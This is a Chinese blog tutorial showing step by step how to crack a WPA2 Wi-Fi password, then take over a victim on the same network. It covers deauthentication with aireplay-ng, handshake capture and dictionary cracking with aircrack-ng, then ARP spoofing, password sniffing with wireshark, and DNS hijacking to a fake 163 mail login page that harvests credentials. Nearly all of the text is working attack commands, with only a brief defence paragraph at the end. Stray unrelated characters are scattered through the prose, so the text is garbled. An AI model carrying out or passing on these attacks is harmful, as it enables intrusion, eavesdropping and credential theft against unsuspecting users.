隨著無(wú)線網(wǎng)絡(luò)走進(jìn)我們的生活，在方便了我們的同時(shí)又產(chǎn)生了許多的安全問(wèn)題橄仆。如果你不加任何防范的話，無(wú)疑是向黑客敞開(kāi)了大門(mén)衅斩。黑客一旦入侵了你的無(wú)線網(wǎng)盆顾，就可以在你毫無(wú)察覺(jué)的情況下監(jiān)聽(tīng)你網(wǎng)絡(luò)的一舉一動(dòng)，你的賬號(hào)密碼等等一切個(gè)人信息將暴露給黑客畏梆。

下面您宪，我就來(lái)演示一下，無(wú)線網(wǎng)是如何被入侵并監(jiān)聽(tīng)的奠涌。

首先我們需要一臺(tái)裝有Kali linux系統(tǒng)的攻擊機(jī)宪巨，還需要一個(gè)外置的無(wú)線網(wǎng)卡。我這里用的是RT3070L芯片的免驅(qū)動(dòng)網(wǎng)卡溜畅，推薦大家也買(mǎi)此類型的捏卓。因?yàn)槲以谶x購(gòu)網(wǎng)卡的時(shí)候踩過(guò)不少的坑，反復(fù)換購(gòu)了好幾款網(wǎng)卡才找到了這個(gè)可以兼容kali 4.15內(nèi)核的網(wǎng)卡慈格。

淘寶鏈接分享

kali linux可以到官網(wǎng)下載怠晴，今天就不講如何安裝了，大家可以自行百度哈浴捆。

先上一張我kali霸氣的桌面截圖

2C7DCFFB124D9F65B68CFCD0A9EEBF56.png

現(xiàn)在開(kāi)始正式破解蒜田，插入我們的無(wú)線網(wǎng)卡，然后斷開(kāi)有線連接选泻，不要使其連接到任何的網(wǎng)絡(luò)冲粤。

打開(kāi)終端輸入 ifconfig 可以看到我們的無(wú)線網(wǎng)卡 wlan0

QQ20180526-230919.png

如果沒(méi)有看到，可能是我們的網(wǎng)卡并沒(méi)有啟動(dòng)滔金。我們可以通過(guò)輸入 ifconfig -a 看到wlan0網(wǎng)卡色解，然后通過(guò) ifconfig wlan0 up 來(lái)啟用它。

啟用網(wǎng)卡后我們需要通過(guò) airmon-ng start wlan0開(kāi)啟網(wǎng)卡的監(jiān)聽(tīng)模式

QQ20180526-231200.png

開(kāi)啟后輸入 ifconfig 這時(shí)我們可以看到我們的網(wǎng)卡名稱變成了wlan0mon

這時(shí)我們就可以通過(guò) airodump-ng wlan0mon 來(lái)掃描附近的wifi熱點(diǎn)

QQ20180526-231410.png

這里我用 Xiaomi_0C327 這個(gè)熱點(diǎn)來(lái)做演示餐茵，其中 BSSID 代表這臺(tái)路由器的MAC地址 CH代表信道

再開(kāi)一個(gè)終端科阎，用 airodump-ng -c 1 --bssid 34:CE:00:26:0C:1C -w cap wlan0mon 對(duì)這臺(tái)路由器進(jìn)行抓包。

-c 代表信道
--bssid 代表路由器的mac地址
-w 指定抓到的包存放在哪個(gè)目錄叫什么名字

這個(gè)時(shí)候我們可以看到此臺(tái)路由器下連接了幾臺(tái)設(shè)備忿族，以及連接設(shè)備的mac地址锣笨。但是由于設(shè)備和路由器是保持連接的狀態(tài)蝌矛，還沒(méi)有辦法抓到設(shè)備發(fā)給路由器帶有密碼信息的包。

QQ20180526-231807.png

所以我們要通過(guò)發(fā)送給路由器假的認(rèn)證請(qǐng)求错英，來(lái)把設(shè)備踢掉線入撒，當(dāng)設(shè)備自動(dòng)重新連接的時(shí)候，密碼就會(huì)被抓到椭岩。

再開(kāi)一個(gè)終端茅逮，輸入 aireplay-ng -0 10 -a 34:CE:00:26:0C:1C -c 98:CA:33:0A:F2:82 wlan0mon 踢下線

-0 代表發(fā)送認(rèn)證消息
10 代表發(fā)送10條
-a 指定路由器mac地址
-c 指定設(shè)備mac地址

2018-05-26-222514_757x522_scrot.png

當(dāng)看到 [ WPA handshake: ] 字樣時(shí)，代表我們已經(jīng)成功的抓到了握手包判哥。在目錄中我們就可以看到如下圖的幾個(gè)文件献雅。

QQ20180526-232105.png

2018-05-26-222919_406x216_scrot.png

最后我們通過(guò)跑字典的方式來(lái)將密碼找出來(lái)。開(kāi)個(gè)終端輸入 aircrack-ng cap-01.cap -w password.txt 爆破

cap-01.cap 是剛剛抓到的包
-w 指定密碼字典

QQ20180526-232355.png

等待一小會(huì)兒密碼就破解出來(lái)了塌计。當(dāng)然我這里使用的是單線程挺身，你也可以拿抓到的包去其他一些跑包軟件里去跑，多線程加GPU能力效率要高一些锌仅≌录兀或者去網(wǎng)上找那些專門(mén)做跑包的店鋪，幾十塊錢(qián)就可以出結(jié)果热芹。

不過(guò)贱傀，最近暴出WPA2加密協(xié)議有漏洞，黑客可以在路由器和設(shè)備間的四次握手中重裝加密密鑰剿吻，這種攻擊方式稱之為KRACK窍箍。也就是說(shuō)可以無(wú)視密碼直接連入wifi，不用再進(jìn)行這些無(wú)聊的抓包跑包丽旅。據(jù)說(shuō)這些漏洞存在于WPA2協(xié)議當(dāng)中，而非單個(gè)產(chǎn)品或?qū)崿F(xiàn)當(dāng)中纺棺。因此榄笙，任何使用WPA2協(xié)議的無(wú)線網(wǎng)絡(luò)均可能受到影響。

也不知道現(xiàn)在這個(gè)漏洞還能不能利用祷蝌，找時(shí)間測(cè)試一下茅撞。

好，內(nèi)網(wǎng)滲透的第一步我們已經(jīng)完成了巨朦，接下來(lái)我們要對(duì)目標(biāo)機(jī)進(jìn)行ARP欺騙和DNS劫持米丘。

打開(kāi)終端輸入 airmon-ng stop wlan0mon 關(guān)閉網(wǎng)卡的監(jiān)聽(tīng)模式，然后用剛剛得到的密碼連入 Xiaomi_0C327 這個(gè)網(wǎng)絡(luò)

連入后通過(guò) ifconfig 查看網(wǎng)卡被分配的ip地址糊啡，可以推斷出網(wǎng)關(guān)地址拄查。

QQ20180527-000135.png

這里我的 wlan0 網(wǎng)卡分配到的地址是 192.168.31.147 所以網(wǎng)關(guān)地址應(yīng)該就是 192.168.31.1

用 nmap 掃描一下網(wǎng)關(guān)，我們就可以看到內(nèi)網(wǎng)中存活了那些主機(jī)

命令 nmap -sP 192.168.31.1/24

QQ20180527-000941.png

這里我選用 192.168.31.181 這臺(tái)機(jī)器作為靶機(jī)

打開(kāi)一個(gè)終端棚蓄，開(kāi)啟自己的流量轉(zhuǎn)發(fā)堕扶，使靶機(jī)的流量可以先經(jīng)過(guò)攻擊機(jī)碍脏，然后再到路由器。

命令 echo 1 > /proc/sys/net/ipv4/ip_forward

然后 cat /proc/sys/net/ipv4/ip_forward 如果返回 1 代表轉(zhuǎn)發(fā)開(kāi)啟成功

打開(kāi)一個(gè)終端稍算，通過(guò)命令 arpspoof -i wlan0 -t 192.168.31.181 -r 192.168.31.1 對(duì)靶機(jī)進(jìn)行ARP欺騙

-i 代表網(wǎng)卡
-t 代表靶機(jī)的ip
-r 代表網(wǎng)關(guān)的ip

2018-05-27-002832_758x507_scrot.png

這時(shí)我們的攻擊機(jī)已經(jīng)成為了一個(gè)中間人典尾，靶機(jī)的所有流量都要先經(jīng)過(guò)攻擊機(jī)，再到路由器糊探。而靶機(jī)用戶毫無(wú)察覺(jué)钾埂。

我們先來(lái)用一款小工具來(lái)監(jiān)聽(tīng)靶機(jī)瀏覽的圖片

打開(kāi)終端輸入 driftnet -i wlan0 等待出圖

2018-05-27-004114_665x534_scrot.png

娛樂(lè)一下的小工具，感覺(jué)沒(méi)啥用科平。接下來(lái)褥紫，我們抓靶機(jī)用戶的登錄賬戶和密碼。

終端輸入 wireshark 打開(kāi)wireshark抓包工具匠抗，選擇我們的 wlan0 網(wǎng)卡

2018-05-27-004757_1545x1001_scrot.png

用靶機(jī)訪問(wèn) http://www.qingtaidu.cn/wp-login.php 這個(gè)wp網(wǎng)站的后臺(tái)并登錄臀晃，然后用攻擊機(jī)抓包。加上一些過(guò)濾條件贝次，方便尋找暗膜。

E0D55CBD-6B06-445B-B5C6-B4FA6DCBC276.png

我們還可以對(duì)靶機(jī)進(jìn)行DNS劫持。正常情況下訪問(wèn) http://www.163.com/ 是這個(gè)樣子

QQ20180527-011336.png

然后用攻擊機(jī)對(duì)這個(gè)網(wǎng)址進(jìn)行DNS劫持矢腻，把他解析到我自己寫(xiě)的163郵箱的登錄頁(yè)面门驾。這樣用戶輸入賬號(hào)密碼都會(huì)被存下來(lái)。

首先在終端輸入命令 vi /etc/ettercap/etter.dns 添加一條解析

www.163.com A 47.94.222.65

然后在嗅探欺騙類工具中打開(kāi)ettercap多柑，【sniff】>【Unified sniffing】奶是，選擇我們的 wlan0 網(wǎng)卡】⒐啵【Plugins】>【Manage the plugins】雙擊 dns_spoof模塊聂沙，最后【Start】>【Start sniffing】

這時(shí)靶機(jī)再訪問(wèn) http://www.163.com/ 就會(huì)變成這個(gè)樣子

QQ20180527-013813.png

以上的嗅探和欺騙都是建立在 http 協(xié)議上的，https 協(xié)議的會(huì)失效初嘹。網(wǎng)上有教程說(shuō)用 sslstrip 可以對(duì) https進(jìn)行降級(jí)及汉，試了一下是可以降級(jí)，但是瀏覽器會(huì)有證書(shū)報(bào)錯(cuò)提示屯烦，用戶很容易就能發(fā)現(xiàn)問(wèn)題坷随。

也不知道大牛們有沒(méi)有什么更好的方式

好了，說(shuō)完了攻擊驻龟，我們來(lái)說(shuō)說(shuō)防御温眉。上面所說(shuō)的嗅探都是建立在內(nèi)網(wǎng)環(huán)境下并且進(jìn)行了ARP欺騙后的，所以要防守就要注意路由器的安全問(wèn)題翁狐，密碼盡量設(shè)置的復(fù)雜一下类溢，大小寫(xiě)加數(shù)字字母符號(hào)，這樣被暴力破解的幾率就會(huì)減小谴蔑。路由器和設(shè)備進(jìn)行雙向綁定豌骏，防止ARP欺騙龟梦。

不早了，今天就說(shuō)這么多吧窃躲！等下一篇文章再分享其他的安全知識(shí)计贰。